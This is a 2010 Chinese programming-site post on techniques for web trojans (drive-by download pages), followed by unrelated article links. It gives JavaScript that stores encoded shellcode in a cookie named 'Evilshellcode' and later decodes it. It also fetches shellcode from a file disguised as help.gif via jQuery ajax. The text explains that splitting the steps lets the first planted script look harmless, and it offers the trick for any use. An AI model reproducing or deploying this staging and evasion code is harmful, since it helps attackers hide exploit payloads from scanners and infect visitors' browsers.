一个网马的tips实现分析


Posted in Javascript onNovember 28, 2010

cookie示例代码:

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

Javascript 相关文章推荐
ASP.NET jQuery 实例5 (显示CheckBoxList成员选中的内容)
Jan 13 Javascript
百度地图api应用标注地理位置信息(js版)
Feb 01 Javascript
jquery如何把参数列严格转换成数组实现思路
Apr 01 Javascript
JavaScript头像上传插件源码分享
Mar 29 Javascript
JavaScript 不支持 indexof 该如何解决
Mar 30 Javascript
jQuery验证插件validate使用详解
May 11 Javascript
JavaScript:Array类型全面解析
May 19 Javascript
BootStrap表单控件之文本域textarea
May 23 Javascript
实例教学如何写vue插件
Nov 30 Javascript
Angular脚手架开发的实现步骤
Apr 09 Javascript
vue实现移动端input上传视频、音频
Aug 18 Javascript
原生JavaScript实现弹幕组件的示例代码
Oct 12 Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
jquery下将选择的checkbox的id组成字符串的方法
Nov 28 #Javascript
用jquery设置按钮的disabled属性的实现代码
Nov 28 #Javascript
IE6弹出“已终止操作”的解决办法
Nov 27 #Javascript
javascript 获取所有id中包含某关键字的控件的实现代码
Nov 25 #Javascript
You might like
php 图片上添加透明度渐变的效果
2009/06/29 PHP
仿AS3实现PHP 事件机制实现代码
2011/01/27 PHP
php删除数组元素示例分享
2014/02/17 PHP
PHP 面向对象程序设计(oop)学习笔记 (五) - PHP 命名空间
2014/06/12 PHP
PHP向浏览器输出内容的4个函数总结
2014/11/17 PHP
php实现模拟post请求用法实例
2015/07/11 PHP
php结合redis高并发下发帖、发微博的实现方法
2016/12/15 PHP
Yii2 hasOne(), hasMany() 实现三表关联的方法(两种)
2017/02/15 PHP
PHP文件系统管理(实例讲解)
2017/09/19 PHP
php读取本地json文件的实例
2018/03/07 PHP
解决Laravel自定义类引入和命名空间的问题
2019/10/15 PHP
Javascript中Event属性搜集整理
2013/09/17 Javascript
采用call方式实现js继承
2014/05/20 Javascript
javascript表单验证大全
2015/08/12 Javascript
深入浅析javascript立即执行函数
2015/10/23 Javascript
Nodejs express框架一个工程中同时使用ejs模版和jade模版
2015/12/28 NodeJs
JS用斜率判断鼠标进入DIV四个方向的方法
2016/11/07 Javascript
微信小程序中吸底按钮适配iPhone X方案
2017/11/29 Javascript
javascript实现QQ空间相册展示源码
2017/12/12 Javascript
js判断节假日实例代码
2017/12/27 Javascript
原生JS实现的自动轮播图功能详解
2018/12/28 Javascript
JavaScript组合模式---引入案例分析
2020/05/23 Javascript
微信小程序文章列表功能完整实例
2020/06/03 Javascript
[02:39]DOTA2国际邀请赛助威团西雅图第一天
2013/08/08 DOTA
Python pygorithm模块用法示例【常见算法测试】
2018/08/16 Python
Python3.4学习笔记之类型判断,异常处理,终止程序操作小结
2019/03/01 Python
Python如何把十进制数转换成ip地址
2020/05/25 Python
python实现mean-shift聚类算法
2020/06/10 Python
《动手做做看》教学反思
2014/04/09 职场文书
信息与工商管理职业规划范文:为梦想而搏击
2014/09/11 职场文书
感谢信怎么写
2015/01/21 职场文书
党员反腐倡廉学习心得体会
2015/08/15 职场文书
2016秋季小学开学寄语
2015/12/03 职场文书
使用PDF.js渲染canvas实现预览pdf的效果示例
2021/04/17 Javascript
cypress测试本地web应用
2022/06/01 Javascript
如何利用python实现列表嵌套字典取值
2022/06/10 Python